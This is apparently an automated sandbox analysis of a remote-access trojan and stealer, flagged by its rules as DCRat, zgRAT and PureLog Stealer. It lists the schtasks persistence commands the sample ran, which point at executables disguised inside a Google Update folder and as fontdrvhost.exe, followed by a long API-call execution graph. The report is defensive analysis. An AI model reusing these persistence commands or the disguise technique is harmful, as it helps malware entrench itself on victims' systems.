                                                                                                                  Target ID:18
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AdbXCBUViTnoVBSsOqA" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff6c8280000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:10:02:07
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                                                  Imagebase:0x590000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000003120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.4579559349.0000000002A07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 76%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe"
                                                                                                                  Imagebase:0x860000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                  Imagebase:0x130000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:10:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Drivers\fontdrvhost.exe
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:32
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vK5Z1luEHZ.bat"
                                                                                                                  Imagebase:0x7ff6eb530000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:33
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff70f940000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:35
                                                                                                                  Start time:10:02:11
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff666e00000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:40
                                                                                                                  Start time:10:02:20
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Drivers\fontdrvhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Drivers\fontdrvhost.exe"
                                                                                                                  Imagebase:0x460000
                                                                                                                  File size:1'995'264 bytes
                                                                                                                  MD5 hash:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1513
                                                                                                                    Total number of Limit Nodes:28
                                                                                                                    execution_graph 25471 bab1b8 27 API calls 2 library calls 25472 b91bbd GetCPInfo IsDBCSLeadByte 23478 b9e5b1 23479 b9e578 23478->23479 23479->23478 23481 b9e85d 23479->23481 23507 b9e5bb 23481->23507 23483 b9e86d 23484 b9e8ca 23483->23484 23495 b9e8ee 23483->23495 23485 b9e7fb DloadReleaseSectionWriteAccess 6 API calls 23484->23485 23486 b9e8d5 RaiseException 23485->23486 23487 b9eac3 23486->23487 23487->23479 23488 b9e966 LoadLibraryExA 23489 b9e979 GetLastError 23488->23489 23490 b9e9c7 23488->23490 23491 b9e98c 23489->23491 23492 b9e9a2 23489->23492 23493 b9e9d9 23490->23493 23496 b9e9d2 FreeLibrary 23490->23496 23491->23490 23491->23492 23497 b9e7fb DloadReleaseSectionWriteAccess 6 API calls 23492->23497 23494 b9ea37 GetProcAddress 23493->23494 23502 b9ea95 23493->23502 23498 b9ea47 GetLastError 23494->23498 23494->23502 23495->23488 23495->23490 23495->23493 23495->23502 23496->23493 23499 b9e9ad RaiseException 23497->23499 23506 b9ea5a 23498->23506 23499->23487 23501 b9e7fb DloadReleaseSectionWriteAccess 6 API calls 23503 b9ea7b RaiseException 23501->23503 23516 b9e7fb 23502->23516 23504 b9e5bb ___delayLoadHelper2@8 6 API calls 23503->23504 23505 b9ea92 23504->23505 23505->23502 23506->23501 23506->23502 23508 b9e5ed 23507->23508 23509 b9e5c7 23507->23509 23508->23483 23524 b9e664 23509->23524 23511 b9e5cc 23512 b9e5e8 23511->23512 23527 b9e78d 23511->23527 23532 b9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23512->23532 23515 b9e836 23515->23483 23517 b9e80d 23516->23517 23518 b9e82f 23516->23518 23519 b9e664 DloadReleaseSectionWriteAccess 3 API calls 23517->23519 23518->23487 23520 b9e812 23519->23520 23521 b9e82a 23520->23521 23522 b9e78d DloadProtectSection 3 API calls 23520->23522 23535 b9e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23521->23535 23522->23521 23533 b9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23524->23533 23526 b9e669 23526->23511 23528 b9e7a2 DloadProtectSection 23527->23528 23529 b9e7dd VirtualProtect 23528->23529 23530 b9e7a8 23528->23530 23534 b9e6a3 VirtualQuery GetSystemInfo 23528->23534 23529->23530 23530->23512 23532->23515 23533->23526 23534->23529 23535->23518 25473 b9b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23744 b9f3b2 23745 b9f3be ___scrt_is_nonwritable_in_current_image 23744->23745 23776 b9eed7 23745->23776 23747 b9f3c5 23748 b9f518 23747->23748 23751 b9f3ef 23747->23751 23849 b9f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23748->23849 23750 b9f51f 23842 ba7f58 23750->23842 23760 b9f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23751->23760 23787 ba8aed 23751->23787 23758 b9f40e 23766 b9f48f 23760->23766 23845 ba7af4 38 API calls 2 library calls 23760->23845 23762 b9f495 23796 ba8a3e 51 API calls 23762->23796 23765 b9f49d 23797 b9df1e 23765->23797 23795 b9f953 GetStartupInfoW _abort 23766->23795 23770 b9f4b1 23770->23750 23771 b9f4b5 23770->23771 23772 b9f4be 23771->23772 23847 ba7efb 28 API calls _abort 23771->23847 23848 b9f048 12 API calls ___scrt_uninitialize_crt 23772->23848 23775 b9f4c6 23775->23758 23777 b9eee0 23776->23777 23851 b9f654 IsProcessorFeaturePresent 23777->23851 23779 b9eeec 23852 ba2a5e 23779->23852 23781 b9eef1 23782 b9eef5 23781->23782 23860 ba8977 23781->23860 23782->23747 23785 b9ef0c 23785->23747 23790 ba8b04 23787->23790 23788 b9fbbc _ValidateLocalCookies 5 API calls 23789 b9f408 23788->23789 23789->23758 23791 ba8a91 23789->23791 23790->23788 23792 ba8ac0 23791->23792 23793 b9fbbc _ValidateLocalCookies 5 API calls 23792->23793 23794 ba8ae9 23793->23794 23794->23760 23795->23762 23796->23765 23960 b90863 23797->23960 23801 b9df3d 24009 b9ac16 23801->24009 23803 b9df46 _abort 23804 b9df59 GetCommandLineW 23803->23804 23805 b9df68 23804->23805 23806 b9dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23804->23806 24013 b9c5c4 23805->24013 24024 b84092 23806->24024 23812 b9dfe0 24018 b9dbde 23812->24018 23813 b9df76 OpenFileMappingW 23816 b9df8f MapViewOfFile 23813->23816 23817 b9dfd6 CloseHandle 23813->23817 23819 b9dfcd UnmapViewOfFile 23816->23819 23820 b9dfa0 __InternalCxxFrameHandler 23816->23820 23817->23806 23819->23817 23824 b9dbde 2 API calls 23820->23824 23826 b9dfbc 23824->23826 23825 b990b7 8 API calls 23827 b9e0aa DialogBoxParamW 23825->23827 23826->23819 23828 b9e0e4 23827->23828 23829 b9e0fd 23828->23829 23830 b9e0f6 Sleep 23828->23830 23833 b9e10b 23829->23833 24057 b9ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23829->24057 23830->23829 23832 b9e12a DeleteObject 23834 b9e13f DeleteObject 23832->23834 23835 b9e146 23832->23835 23833->23832 23834->23835 23836 b9e189 23835->23836 23837 b9e177 23835->23837 24054 b9ac7c 23836->24054 24058 b9dc3b 6 API calls 23837->24058 23839 b9e17d CloseHandle 23839->23836 23841 b9e1c3 23846 b9f993 GetModuleHandleW 23841->23846 24309 ba7cd5 23842->24309 23845->23766 23846->23770 23847->23772 23848->23775 23849->23750 23851->23779 23864 ba3b07 23852->23864 23855 ba2a67 23855->23781 23857 ba2a6f 23858 ba2a7a 23857->23858 23878 ba3b43 DeleteCriticalSection 23857->23878 23858->23781 23907 bac05a 23860->23907 23863 ba2a7d 7 API calls 2 library calls 23863->23782 23865 ba3b10 23864->23865 23867 ba3b39 23865->23867 23869 ba2a63 23865->23869 23879 ba3d46 23865->23879 23884 ba3b43 DeleteCriticalSection 23867->23884 23869->23855 23870 ba2b8c 23869->23870 23900 ba3c57 23870->23900 23873 ba2ba1 23873->23857 23875 ba2baf 23876 ba2bbc 23875->23876 23906 ba2bbf 6 API calls ___vcrt_FlsFree 23875->23906 23876->23857 23878->23855 23885 ba3c0d 23879->23885 23882 ba3d7e InitializeCriticalSectionAndSpinCount 23883 ba3d69 23882->23883 23883->23865 23884->23869 23886 ba3c4f 23885->23886 23887 ba3c26 23885->23887 23886->23882 23886->23883 23887->23886 23892 ba3b72 23887->23892 23890 ba3c3b GetProcAddress 23890->23886 23891 ba3c49 23890->23891 23891->23886 23898 ba3b7e ___vcrt_FlsFree 23892->23898 23893 ba3bf3 23893->23886 23893->23890 23894 ba3b95 LoadLibraryExW 23895 ba3bfa 23894->23895 23896 ba3bb3 GetLastError 23894->23896 23895->23893 23897 ba3c02 FreeLibrary 23895->23897 23896->23898 23897->23893 23898->23893 23898->23894 23899 ba3bd5 LoadLibraryExW 23898->23899 23899->23895 23899->23898 23901 ba3c0d ___vcrt_FlsFree 5 API calls 23900->23901 23902 ba3c71 23901->23902 23903 ba3c8a TlsAlloc 23902->23903 23904 ba2b96 23902->23904 23904->23873 23905 ba3d08 6 API calls ___vcrt_FlsFree 23904->23905 23905->23875 23906->23873 23908 bac077 23907->23908 23911 bac073 23907->23911 23908->23911 23913 baa6a0 23908->23913 23909 b9fbbc _ValidateLocalCookies 5 API calls 23910 b9eefe 23909->23910 23910->23785 23910->23863 23911->23909 23914 baa6ac ___scrt_is_nonwritable_in_current_image 23913->23914 23925 baac31 EnterCriticalSection 23914->23925 23916 baa6b3 23926 bac528 23916->23926 23918 baa6c2 23924 baa6d1 23918->23924 23939 baa529 29 API calls 23918->23939 23921 baa6e2 _abort 23921->23908 23922 baa6cc 23940 baa5df GetStdHandle GetFileType 23922->23940 23941 baa6ed LeaveCriticalSection _abort 23924->23941 23925->23916 23927 bac534 ___scrt_is_nonwritable_in_current_image 23926->23927 23928 bac558 23927->23928 23929 bac541 23927->23929 23942 baac31 EnterCriticalSection 23928->23942 23950 ba91a8 20 API calls _free 23929->23950 23932 bac564 23938 bac590 23932->23938 23943 bac479 23932->23943 23933 bac546 23951 ba9087 26 API calls __cftof 23933->23951 23936 bac550 _abort 23936->23918 23952 bac5b7 LeaveCriticalSection _abort 23938->23952 23939->23922 23940->23924 23941->23921 23942->23932 23944 bab136 _free 20 API calls 23943->23944 23945 bac48b 23944->23945 23949 bac498 23945->23949 23953 baaf0a 23945->23953 23946 ba8dcc _free 20 API calls 23947 bac4ea 23946->23947 23947->23932 23949->23946 23950->23933 23951->23936 23952->23936 23954 baac98 _free 5 API calls 23953->23954 23955 baaf31 23954->23955 23956 baaf4f InitializeCriticalSectionAndSpinCount 23955->23956 23957 baaf3a 23955->23957 23956->23957 23958 b9fbbc _ValidateLocalCookies 5 API calls 23957->23958 23959 baaf66 23958->23959 23959->23945 24059 b9ec50 23960->24059 23963 b90888 GetProcAddress 23965 b908b9 GetProcAddress 23963->23965 23966 b908a1 23963->23966 23964 b908e7 23967 b90c14 GetModuleFileNameW 23964->23967 24070 ba75fb 42 API calls 2 library calls 23964->24070 23969 b908cb 23965->23969 23966->23965 23976 b90c32 23967->23976 23969->23964 23970 b90b54 23970->23967 23971 b90b5f GetModuleFileNameW CreateFileW 23970->23971 23972 b90c08 CloseHandle 23971->23972 23973 b90b8f SetFilePointer 23971->23973 23972->23967 23973->23972 23974 b90b9d ReadFile 23973->23974 23974->23972 23978 b90bbb 23974->23978 23979 b90c94 GetFileAttributesW 23976->23979 23981 b90c5d CompareStringW 23976->23981 23982 b90cac 23976->23982 24061 b8b146 23976->24061 24064 b9081b 23976->24064 23978->23972 23980 b9081b 2 API calls 23978->23980 23979->23976 23979->23982 23980->23978 23981->23976 23983 b90cec 23982->23983 23987 b90cb7 23982->23987 23984 b90dfb 23983->23984 23988 b8b146 GetVersionExW 23983->23988 24008 b9a64d GetCurrentDirectoryW 23984->24008 23985 b90cd0 GetFileAttributesW 23986 b90ce8 23985->23986 23985->23987 23986->23983 23987->23985 23987->23986 23989 b90d06 23988->23989 23990 b90d0d 23989->23990 23991 b90d73 23989->23991 23993 b9081b 2 API calls 23990->23993 23992 b84092 _swprintf 51 API calls 23991->23992 23994 b90d9b AllocConsole 23992->23994 23995 b90d17 23993->23995 23997 b90da8 GetCurrentProcessId AttachConsole 23994->23997 23998 b90df3 ExitProcess 23994->23998 23996 b9081b 2 API calls 23995->23996 23999 b90d21 23996->23999 24075 ba3e13 23997->24075 24071 b8e617 23999->24071 24002 b90dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24002->23998 24004 b84092 _swprintf 51 API calls 24005 b90d4f 24004->24005 24006 b8e617 53 API calls 24005->24006 24007 b90d5e 24006->24007 24007->23998 24008->23801 24010 b9081b 2 API calls 24009->24010 24011 b9ac2a OleInitialize 24010->24011 24012 b9ac4d GdiplusStartup SHGetMalloc 24011->24012 24012->23803 24014 b9c5ce 24013->24014 24015 b91fac CharUpperW 24014->24015 24016 b9c6e4 24014->24016 24100 b8f3fa 82 API calls 2 library calls 24014->24100 24015->24014 24016->23812 24016->23813 24019 b9ec50 24018->24019 24020 b9dbeb SetEnvironmentVariableW 24019->24020 24021 b9dc0e 24020->24021 24022 b9dc36 24021->24022 24023 b9dc2a SetEnvironmentVariableW 24021->24023 24022->23806 24023->24022 24101 b84065 24024->24101 24027 b9b6dd LoadBitmapW 24028 b9b70b GetObjectW 24027->24028 24029 b9b6fe 24027->24029 24031 b9b71a 24028->24031 24135 b9a6c2 FindResourceW 24029->24135 24130 b9a5c6 24031->24130 24034 b9b770 24046 b8da42 24034->24046 24035 b9b74c 24151 b9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24035->24151 24037 b9a6c2 13 API calls 24039 b9b73d 24037->24039 24039->24035 24041 b9b743 DeleteObject 24039->24041 24040 b9b754 24152 b9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24040->24152 24041->24035 24043 b9b75d 24153 b9a80c 8 API calls 24043->24153 24045 b9b764 DeleteObject 24045->24034 24164 b8da67 24046->24164 24051 b990b7 24297 b9eb38 24051->24297 24055 b9acab GdiplusShutdown CoUninitialize 24054->24055 24055->23841 24057->23833 24058->23839 24060 b9086d GetModuleHandleW 24059->24060 24060->23963 24060->23964 24062 b8b15a GetVersionExW 24061->24062 24063 b8b196 24061->24063 24062->24063 24063->23976 24065 b9ec50 24064->24065 24066 b90828 GetSystemDirectoryW 24065->24066 24067 b9085e 24066->24067 24068 b90840 24066->24068 24067->23976 24069 b90851 LoadLibraryW 24068->24069 24069->24067 24070->23970 24072 b8e627 24071->24072 24077 b8e648 24072->24077 24076 ba3e1b 24075->24076 24076->24002 24076->24076 24083 b8d9b0 24077->24083 24080 b8e66b LoadStringW 24081 b8e645 24080->24081 24082 b8e682 LoadStringW 24080->24082 24081->24004 24082->24081 24088 b8d8ec 24083->24088 24085 b8d9cd 24087 b8d9e2 24085->24087 24096 b8d9f0 26 API calls 24085->24096 24087->24080 24087->24081 24089 b8d904 24088->24089 24095 b8d984 _strncpy 24088->24095 24091 b8d928 24089->24091 24097 b91da7 WideCharToMultiByte 24089->24097 24094 b8d959 24091->24094 24098 b8e5b1 50 API calls __vsnprintf 24091->24098 24099 ba6159 26 API calls 3 library calls 24094->24099 24095->24085 24096->24087 24097->24091 24098->24094 24099->24095 24100->24014 24102 b8407c __vswprintf_c_l 24101->24102 24105 ba5fd4 24102->24105 24108 ba4097 24105->24108 24109 ba40bf 24108->24109 24110 ba40d7 24108->24110 24125 ba91a8 20 API calls _free 24109->24125 24110->24109 24112 ba40df 24110->24112 24114 ba4636 __cftof 38 API calls 24112->24114 24113 ba40c4 24126 ba9087 26 API calls __cftof 24113->24126 24116 ba40ef 24114->24116 24127 ba4601 20 API calls 2 library calls 24116->24127 24117 ba40cf 24118 b9fbbc _ValidateLocalCookies 5 API calls 24117->24118 24120 b84086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24118->24120 24120->24027 24121 ba4167 24128 ba49e6 51 API calls 3 library calls 24121->24128 24124 ba4172 24129 ba46b9 20 API calls _free 24124->24129 24125->24113 24126->24117 24127->24121 24128->24124 24129->24117 24154 b9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24130->24154 24132 b9a5cd 24133 b9a5d9 24132->24133 24155 b9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24132->24155 24133->24034 24133->24035 24133->24037 24136 b9a7d3 24135->24136 24137 b9a6e5 SizeofResource 24135->24137 24136->24028 24136->24031 24137->24136 24138 b9a6fc LoadResource 24137->24138 24138->24136 24139 b9a711 LockResource 24138->24139 24139->24136 24140 b9a722 GlobalAlloc 24139->24140 24140->24136 24141 b9a73d GlobalLock 24140->24141 24142 b9a7cc GlobalFree 24141->24142 24143 b9a74c __InternalCxxFrameHandler 24141->24143 24142->24136 24144 b9a754 CreateStreamOnHGlobal 24143->24144 24145 b9a76c 24144->24145 24146 b9a7c5 GlobalUnlock 24144->24146 24156 b9a626 GdipAlloc 24145->24156 24146->24142 24149 b9a79a GdipCreateHBITMAPFromBitmap 24150 b9a7b0 24149->24150 24150->24146 24151->24040 24152->24043 24153->24045 24154->24132 24155->24133 24157 b9a638 24156->24157 24158 b9a645 24156->24158 24160 b9a3b9 24157->24160 24158->24146 24158->24149 24158->24150 24161 b9a3da GdipCreateBitmapFromStreamICM 24160->24161 24162 b9a3e1 GdipCreateBitmapFromStream 24160->24162 24163 b9a3e6 24161->24163 24162->24163 24163->24158 24165 b8da75 __EH_prolog 24164->24165 24166 b8daa4 GetModuleFileNameW 24165->24166 24167 b8dad5 24165->24167 24168 b8dabe 24166->24168 24210 b898e0 24167->24210 24168->24167 24170 b8db31 24221 ba6310 24170->24221 24172 b8e261 78 API calls 24175 b8db05 24172->24175 24175->24170 24175->24172 24188 b8dd4a 24175->24188 24176 b8db44 24177 ba6310 26 API calls 24176->24177 24185 b8db56 ___vcrt_FlsFree 24177->24185 24178 b8dc85 24178->24188 24257 b89d70 81 API calls 24178->24257 24182 b8dc9f ___std_exception_copy 24183 b89bd0 82 API calls 24182->24183 24182->24188 24186 b8dcc8 ___std_exception_copy 24183->24186 24185->24178 24185->24188 24235 b89e80 24185->24235 24251 b89bd0 24185->24251 24256 b89d70 81 API calls 24185->24256 24186->24188 24206 b8dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24186->24206 24258 b91b84 MultiByteToWideChar 24186->24258 24244 b8959a 24188->24244 24189 b8e159 24195 